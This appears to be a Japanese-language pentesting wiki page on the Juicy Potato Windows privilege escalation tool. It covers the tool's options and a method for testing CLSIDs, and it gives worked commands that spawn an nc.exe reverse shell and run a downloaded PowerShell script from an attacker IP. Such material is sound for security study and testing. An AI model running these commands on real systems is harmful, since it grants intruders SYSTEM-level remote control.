WhiteIntel

WhiteIntelは、ダークウェブを活用した検索エンジンで、企業やその顧客が盗難マルウェアによって侵害されていないかをチェックするための無料機能を提供しています。

WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。

彼らのウェブサイトをチェックして、無料でエンジンを試すことができます：

Juicy Potato（黄金特権の悪用）

RottenPotatoNG_の甘いバージョンで、つまり、WindowsサービスアカウントからNT AUTHORITY\SYSTEMへの別のローカル特権昇格ツール

https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifactsからjuicypotatoをダウンロードできます

概要

juicy-potato Readmeから:

RottenPotatoNGおよびそのバリアントは、BITS サービスに基づく特権昇格チェーンを活用し、MiTMリスナーが127.0.0.1:6666で実行され、SeImpersonateまたはSeAssignPrimaryToken特権を持っている場合に発生します。Windowsビルドのレビュー中に、BITSが意図的に無効にされ、ポート6666が使用されているセットアップを見つけました。

RottenPotatoNGを武器化することにしました：Juicy Potato登場。

理論については、Rotten Potato - サービスアカウントからSYSTEMへの特権昇格を参照し、リンクと参照先のチェーンをフォローしてください。

私たちは、BITS以外にも悪用できるCOMサーバーがいくつかあることを発見しました。それらは単に次のようにする必要があります：

1. 現在のユーザー（通常はインパーソネーション特権を持つ「サービスユーザー」）によってインスタンス化可能であること

2. IMarshalインターフェースを実装すること

3. 昇格されたユーザー（SYSTEM、管理者、...）として実行すること

いくつかのテストの後、いくつかのWindowsバージョンで興味深いCLSIDのリストを取得してテストしました。

Juicyの詳細

JuicyPotatoを使用すると、次のことができます：

• ターゲットCLSID 希望するCLSIDを選択します。 こちら でOSごとに整理されたリストを見つけることができます。

• COMリスニングポート マーシャリングされたハードコードされた6666の代わりに好きなCOMリスニングポートを定義します

• COMリスニングIPアドレス サーバーを任意のIPにバインドします

• プロセス作成モード インパーソネーションユーザーの特権に応じて、次から選択できます：

• CreateProcessWithToken（SeImpersonateが必要）

• CreateProcessAsUser（SeAssignPrimaryTokenが必要）

• 両方

• 起動するプロセス 悪用が成功した場合に実行する実行可能ファイルまたはスクリプトを起動します

• プロセス引数 起動されるプロセスの引数をカスタマイズします

• RPCサーバーアドレス ステルスアプローチのために、外部RPCサーバーに認証できます

• RPCサーバーポート 外部サーバーに認証する場合で、ファイアウォールがポート135をブロックしている場合に便利です...

• TESTモード 主にテスト目的で、CLSIDsのテストに使用されます。DCOMを作成し、トークンのユーザーを印刷します。テストについては こちらを参照してください

使用法

T:\>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)

最終的な考え

Juicy Potato Readme** から:**

ユーザーが SeImpersonate または SeAssignPrimaryToken 特権を持っている場合、あなたは SYSTEM です。

これらのすべての COM サーバーの悪用を防ぐのはほぼ不可能です。これらのオブジェクトのアクセス許可を DCOMCNFG を介して変更することを考えることができますが、成功を祈ります、これは挑戦的になるでしょう。

実際の解決策は、* SERVICE アカウントの下で実行される機密アカウントおよびアプリケーションを保護することです。DCOM を停止することは、確かにこのエクスプロイトを阻害するでしょうが、基礎となる OS に深刻な影響を与える可能性があります。

出典: http://ohpe.it/juicy-potato/

例

注意: 試すための CLSID のリストについては、このページ を参照してください。

nc.exe 逆シェルを取得

c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

c:\Users\Public>

Powershell 逆

.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *

新しいCMDを起動する（RDPアクセスがある場合）

CLSIDの問題

しばしば、JuicyPotatoが使用するデフォルトのCLSIDは機能せず、エクスプロイトが失敗します。通常、動作するCLSIDを見つけるために複数の試行が必要です。特定のオペレーティングシステム用に試すためのCLSIDのリストを取得するには、このページを訪れる必要があります：

CLSIDsの確認

まず、juicypotato.exe以外のいくつかの実行可能ファイルが必要です。

Join-Object.ps1をダウンロードしてPSセッションにロードし、GetCLSID.ps1をダウンロードして実行します。そのスクリプトはテストする可能性のあるCLSIDのリストを作成します。

次に、test_clsid.bat (CLSIDリストへのパスとjuicypotato実行可能ファイルへのパスを変更してください)をダウンロードして実行します。すべてのCLSIDを試行し始め、ポート番号が変わると、CLSIDが機能したことを意味します。

パラメータ -cを使用して、動作するCLSIDを確認します

参考文献

• https://github.com/ohpe/juicy-potato/blob/master/README.md

WhiteIntel

WhiteIntelは、ダークウェブを活用した検索エンジンで、企業やその顧客が盗難マルウェアによって侵害されていないかをチェックするための無料機能を提供しています。

WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。

彼らのウェブサイトをチェックし、無料でエンジンを試すことができます：